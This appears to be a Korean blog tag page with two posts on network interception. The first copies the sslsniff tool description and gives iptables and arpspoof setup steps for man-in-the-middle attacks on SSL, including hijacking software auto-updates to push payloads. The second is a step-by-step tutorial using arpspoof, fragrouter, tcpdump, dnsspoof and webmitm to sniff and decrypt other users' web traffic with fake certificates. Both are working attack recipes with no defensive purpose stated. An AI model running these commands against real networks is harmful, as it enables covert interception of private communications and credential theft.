'arpspoof'에 해당되는 글 2건

  1. 2011.04.25 SSL 인증서 릴레이 네트워크 중계 sslsniff
  2. 2009.06.03 dsniff 이용한 패킷 스니핑 (Packet Sniff)
2011. 4. 25. 18:37

SSL 인증서 릴레이 네트워크 중계 sslsniff

Some History:

This tool was originally written to demonstrate and exploit IE's vulnerability to a specific "basicConstraints" man-in-the-middle attack. While Microsoft has since fixed the vulnerability that allowed leaf certificates to act as signing certificates, this tool is still occasionally useful for other purposes.

It is designed to MITM all SSL connections on a LAN and dynamically generates certs for the domains that are being accessed on the fly. The new certificates are constructed in a certificate chain that is signed by any certificate that you provide.

The New Scoop:

Version 0.6 has been significantly updated to additionally support the null-prefix attacks that I demonstrated at BlackHat 09 and Defcon 17. These allow for completely silent MITM attacks against SSL/TLS in the NSS, Microsoft CryptoAPI, and GnuTLS stacks — ultimately allowing for SSL communication in Firefox, Internet Explorer, Chrome, Thunderbird, Outlook, Evolution, Pidgin, AIM, irssi, and every other client that uses the Microsoft CryptoAPI to be intercepted.

sslsniff has also been updated to support the OCSP attacks that I published at Blackhat 09 and Defcon 17, thus making the revocation of null-prefix certificates very difficult. Additionally, sslsniff now supports modes for hijacking auto-updates from Mozilla products, as well as for Firefox/Thunderbird addons. Attackers can specify payloads of their choice, which will be delivered to the targets being man-in-the-middled.

sslsniff is useful for deploying other vulnerabilities as well. This is the tool that the people who pulled the recent MD5 hash collision publicity stunt used to demonstrate MITM attacks with their rogue CA-certificate. Also, anyone who is capable of obtaining a forged certificate by any means can easily deploy it through sslsniff with the targeted mode designed for null-prefix attacks.

For more information on these attacks, see the video from Defcon 17.

The three steps to get this running are:
  • Download and run sslsniff-0.7.tar.gz
  • Setup iptables
  • Run arp-spoof

Installing sslsniff

  • Install the sslsniff dependencies (openssl, libboost1.35-dev, libboost-filesystem1.35-dev, libboost-thread1.35-dev, liblog4cpp5-dev)
  • Unpack sslsniff-0.7.tar.gz, run './configure', run 'make'

sslsniff requires Linux 2.4/2.6, although it can easily be ported to other platforms.

Running sslsniff

  • sslsniff can now be run in the old "authority" mode or the new "targeted" mode. You can specify a single cert to sign new certificates with, or you can specify a directory full of certificates to use for targeted attacks (these can be null-prefix or universal wildcard certificates).
  • sslsniff can now also defeat OCSP, fingerprint clients to attack, and hijack auto-updates.
  • See the README for more information on how to run sslsniff

Setting up iptables

  • Flip your machine into ip_forward mode (echo 1 > /proc/sys/net/ipv4/ip_forward)
  • Add a rule to intercept SSL traffic (iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports <$listenPort>)
  • If you wish to fingerprint clients and only intercept some traffic based on client type, add a rule to intercept HTTP traffic (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports <$httpListenPort>)

Running arpspoof

Assuming we want to intercept SSL traffic from, we need to trick that host into thinking that we're the router. Using arpspoof, we can convince the target that the router's MAC address is our MAC address.

  • arpspoof -i eth0 -t

At this point, any SSL traffic should get proxied by sslsniff and logged to the file you specify.

출처 : http://www.thoughtcrime.org/software/sslsniff/

Trackback 0 Comment 0
2009. 6. 3. 15:14

dsniff 이용한 패킷 스니핑 (Packet Sniff)

동일 네트웍 상에 있는 컴퓨터 들은, gateway 의 mac주소를 arp spoofing 하는 방법으로 밖으로 나가는 패킷들을 sniffing 할 수 있다.

dsniff 란 툴을 이용하면 이것들을 쉽게 할 수 있다.

콘솔을 3개 띄워서 각각의 명령어를 친다.

1. gateway 의 주소를 속인다
$ sudo arpspoof -i wlan0 -t

2. 들어오는 패킷을 외부로 라우팅 해준다. (이렇게 해야 실제 컴퓨터를 사용하는 사람은 기존과 똑같이 인터넷을 이용할 수 있다.)
$ sudo fragrouter -i wlan0 -B1

3. 원하는 packet 을 캡춰한다.
$ sudo tcpdump tcp dst port 80 -i wlan0 -s1500 -w-

만약 SSL 을 사용한다면 이런식으로 패킷을 본다고 해도 암호화 되었으므로 내용을 볼 수는 없다. 이때는 MITM 이라는 공격 방법을 통해 가능하다.

원리는 중간에서 가짜 인증서를 클라이언트에게 주고 패킷을 실서버랑 중계해 내용을 sniffing 하는 방법으로, 사용자가 인증서를 제대로 확인하고 접속 할때만 가능하다.

사용자가 위와 같은 경고창을 사용자가 무시한면 sniffing 이 가능하다. (그림: IE6 인증서 경고창)

1, 2 번작업 동일.

3. dns 를 속인다. (host 파일에 속일 주소를 적는다.) 이렇게 하면 내가 실제 서버가 아닌 내가 지정한 서버로 접속을 하도록 만들 수 있다.
$ cat host *.sample.com
$ sudo dnsspoof -f host

4. 이제 들어오는 패킷을 실제 웹서버로 중계한다.
$ sudo webmitm -dd

중계하는 과정에 가짜 인증서로 암호화된 패킷을 디코딩 해 모두 볼 수 있게 된다. 실제 웹서버에게는 정상적인 인증서로 내용을 암호화해서 보내게 된다.


Trackback 1 Comment 0